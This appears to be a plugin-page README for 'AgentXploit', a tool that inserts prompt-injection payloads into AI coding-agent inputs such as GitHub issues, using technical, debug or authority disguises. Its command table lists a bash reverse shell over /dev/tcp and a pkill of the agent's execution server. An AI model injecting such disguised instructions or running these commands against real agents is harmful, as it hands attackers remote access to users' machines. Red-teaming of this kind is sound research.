AgentXploit

Advanced AI security research and exploit agent for analyzing vulnerabilities in AI model interactions using OpenAI GPT-4o via LiteLLM.

Quick Start

# Install the tool
pip install -e ".[dev]"

# Analyze a single trajectory file
agentxploit analyze -f ./trajectory.json

# Batch process multiple files
agentxploit batch -d ./trajectories/

# Static analysis of agent repository
agentxploit static -r ./target_agent/

# Comprehensive security analysis
agentxploit comprehensive -r ./target_agent/

Commands

1. Single File Analysis (`analyze`)

Analyzes a single trajectory file and generates an injection report.

agentxploit analyze -f ./trajectory.json
agentxploit analyze -f ./trajectory.json -s debug
agentxploit analyze -f ./trajectory.json -p "custom-command"

Options:

-f, --file PATH - Trajectory file to analyze (required)
-s, --strategy - Injection strategy: technical, debug, authority (default: technical)
-p, --payload TEXT - Custom injection command
-v, --verbose - Enable detailed logging
--dry-run - Perform dry run without API calls

2. Batch Processing (`batch`)

Processes multiple trajectory files in parallel.

agentxploit batch -d ./trajectories/
agentxploit batch -d ./trajectories/ -s authority --max-workers 8

Options:

-d, --directory PATH - Directory with trajectory files (required)
-s, --strategy - Injection strategy (default: technical)
-p, --payload TEXT - Custom injection command
--max-workers INT - Concurrent workers (default: 3)
-v, --verbose - Enable detailed logging
--dry-run - Estimate costs without API calls

3. Static Repository Analysis (`static`)

Performs static analysis of an agent repository.

agentxploit static -r ./target_agent/
agentxploit static -r ./target_agent/ --max-files 30

Options:

-r, --repository PATH - Agent repository to analyze (required)
--max-files INT - Maximum files to read (default: 20)
-v, --verbose - Enable detailed logging
--dry-run - Perform dry run without API calls

4. Comprehensive Security Analysis (`comprehensive`)

Combines static analysis with injection vulnerability assessment.

agentxploit comprehensive -r ./target_agent/
agentxploit comprehensive -r ./target_agent/ -s authority --max-files 25

Options:

-r, --repository PATH - Agent repository to analyze (required)
--max-files INT - Maximum files to read (default: 20)
-s, --strategy - Injection strategy: technical, debug, authority (default: technical)
-p, --payload TEXT - Custom injection command
-v, --verbose - Enable detailed logging
--dry-run - Perform dry run without API calls

Injection Strategies

| Strategy | Description | Use Case | |----------|-------------|----------| | technical | Technical justification disguise | System administration scenarios | | debug | Debugging requirement disguise | Troubleshooting contexts | | authority | Authority-based instructions | Administrative directives |

Command Types

| Type | Command | Purpose | Risk Level | |------|---------|---------|------------| | pkill (default) | pkill -f "action_execution_server" | Process termination | Medium | | reverse-shell | bash -i >& /dev/tcp/IP/PORT 0>&1 | Remote access | High | | custom | User-defined | Specific test scenarios | Varies |

Input Formats

The tool accepts JSON files in two formats:

GitHub Issue Format

{
  "user_input": "<issue>\nYour GitHub issue content...\n</issue>"
}

Conversation Log Format

{
  "log": [
    {
      "role": "user", 
      "content": "User message content..."
    }
  ]
}

Output Format

Analysis reports are generated in the analysis/ directory:

{
  "task_id": "unique_identifier",
  "timestamp": "2025-06-30T16:50:42.812581", 
  "original_length": 2279,
  "injected_length": 3404,
  "command_type": "pkill",
  "injection_strategy": "technical",
  "injection_success": true,
  "injection_points": [
    {
      "position": "In Steps to Reproduce section",
      "context": "## Steps to Reproduce", 
      "psychological_hook": "Commands appear legitimate",
      "success_probability": "high"
    }
  ],
  "injected_text": "Full content with injected prompts..."
}

Installation

# Development installation (recommended)
git clone <repository-url>
cd injection-agent
pip install -e ".[dev]"

# Verify installation
agentxploit --help

Configuration

API Key Setup

The tool is pre-configured with an OpenAI API key, but you can override it:

# Environment variable
export OPENAI_API_KEY="sk-proj-your-key-here"

# Or edit src/AgentXploit/config/settings.py
DEFAULT_OPENAI_API_KEY = "your-key-here"

Examples

Basic Analysis

# Analyze single file
agentxploit analyze -f ./issue_123.json

# Use debug strategy
agentxploit analyze -f ./issue_123.json -s debug -v

# Custom payload
agentxploit analyze -f ./issue_123.json -p "custom-shell-command"

Batch Processing

# Process all files in directory
agentxploit batch -d ./trajectories/

# High-throughput processing
agentxploit batch -d ./large_dataset/ --max-workers 10

# Cost estimation
agentxploit batch -d ./trajectories/ --dry-run

Repository Analysis

# Static analysis
agentxploit static -r ./agent_repo/ -v --max-files 30

# Comprehensive security analysis
agentxploit comprehensive -r ./agent_repo/ -s technical

Project Structure

agentxploit/
├── src/AgentXploit/              # Main package
│   ├── agent.py                  # LiteLLM-powered agent
│   ├── cli.py                    # Command-line interface
│   ├── config/settings.py        # Configuration and API keys
│   ├── enums/injection_types.py  # Strategy and command enums
│   ├── tools/                    # Analysis tools
│   └── utils/                    # Utility functions
├── analysis/                     # Generated analysis reports
├── pyproject.toml               # Project configuration
└── README.md                    # This file

License

Licensed under the Apache License, Version 2.0. See LICENSE file for details.

whatsapp

Summary

Install to Claude Code

AgentXploit

Quick Start

Commands

1. Single File Analysis (`analyze`)

2. Batch Processing (`batch`)

3. Static Repository Analysis (`static`)

4. Comprehensive Security Analysis (`comprehensive`)

Injection Strategies

Command Types

Input Formats

GitHub Issue Format

Conversation Log Format

Output Format

Installation

Configuration

API Key Setup

Examples

Basic Analysis

Batch Processing

Repository Analysis

Project Structure

License

Related plugins

Plugins by category

whatsapp

Summary

Install to Claude Code

AgentXploit

Quick Start

Commands

1. Single File Analysis (analyze)

2. Batch Processing (batch)

3. Static Repository Analysis (static)

4. Comprehensive Security Analysis (comprehensive)

Injection Strategies

Command Types

Input Formats

GitHub Issue Format

Conversation Log Format

Output Format

Installation

Configuration

API Key Setup

Examples

Basic Analysis

Batch Processing

Repository Analysis

Project Structure

License

Related plugins

Plugins by category

1. Single File Analysis (`analyze`)

2. Batch Processing (`batch`)

3. Static Repository Analysis (`static`)

4. Comprehensive Security Analysis (`comprehensive`)